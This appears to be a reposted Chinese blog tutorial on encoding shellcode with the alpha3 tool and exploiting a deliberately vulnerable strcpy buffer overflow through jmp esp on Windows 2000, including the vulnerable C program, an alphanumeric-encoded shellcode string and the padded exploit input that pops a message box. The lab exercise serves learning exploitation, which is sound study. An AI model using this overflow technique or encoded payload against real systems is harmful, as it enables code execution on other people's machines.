我是靠谱客的博主 坦率大神,最近开发中收集的这篇文章主要介绍使用alpha3编码shellcode,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

使用alpha3进行编码shellcode,生成一段没有坏字符的shellcode。然后使用jmp esp进行shellcode注入。
环境:win2000
工具:ollydbg,vc6,010editor

原程序

原程序为example.cpp。

#include <stdio.h>
#include <windows.h>
#include <string.h>

void hack(const char* input)
{
    char buf[10];
    
    LoadLibrary("user32.dll");//使用user32.dll中的弹框MessageBoxA
    strcpy(buf, input);//缓冲区溢出,利用jmp esp进行注入
}
int main(int argc, char* argv[])
{
	hack(argv[1]);
    return 0;
}

使用vc6进行编译后,生example.exe。

生成shellcode

这是一个弹窗的机器码,生成机器码的过程是先写一个c源码,然后再编译后,从od中复制得到机器码。

其中机器码可以利用010editor进行输入,下面是其中的内容。

因为这里shellcode的生成不是重点,而且存在某些地址在不同环境下可能不同,所以只是用作示例。了解到它的作用只是弹窗就可以了。

对shellcode进行编码

Shellcode编码技术 - 先知社区

alpha2/3可以用来将shellcode进行编码,以达到减少或清除坏字符的目的。

github上
SkyLined/alpha3: Alphanumeric shellcode encoder.

对alpha3有相当的介绍。
使用alpha3生成alphanumeric shellcode - 简书
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南_HiTaQini-CSDN博客

在上述第三篇中,提供了编译后的alpha3,下载后可以直接使用。
https://github.com/TaQini/alpha3

使用下述的命令对shellcode进行编码。

其中为什么这里使用esp,而不是eax,或者ebx等。我们先来看看实验的原理。当执行完jmp esp后,eip也就指向了shellcode的起始位置,那么根据上述文章中提到的 “而查看ida中返回编的代码可知调用shellcode的汇编指令是call eax 所以base 就是EAX” ,可以知道此时这里的esp就相当于call eax中的eax,jmp esp相当于call eax。

执行后的shellcode就是

TYhffffk4diFkDql02Dqm0D1CuEE2C4s4o0t0w174t0c7L0Q2u0R0S1l2u0R100S3W3d120b2E0c3z0X0n3C7K8M350c3z4J5p3G2D8L0h03

实验验证

根据jmp esp的原理,对exploit进行填充,如下。复制的时候可能会出现某些字符发生错误。下面的图片进行对比shellcode内容。

1111111111111111*汊wTYhffffk4diFkDql02Dqm0D1CuEE2C4s4o0t0w174t0c7L0Q2u0R0S1l2u0R100S3W3d120b2E0c3z0X0n3C7K8M350c3z4J5p3G2D8L0h03

在win2000中运行下。可以看到弹窗已经出现。

本文重点在于对于jmp esp时,使用alpha2/3编码时选择的base是esp。

最后

以上就是坦率大神为你收集整理的使用alpha3编码shellcode的全部内容,希望文章能够帮你解决使用alpha3编码shellcode所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(35)

评论列表共有 0 条评论

立即
投稿
返回
顶部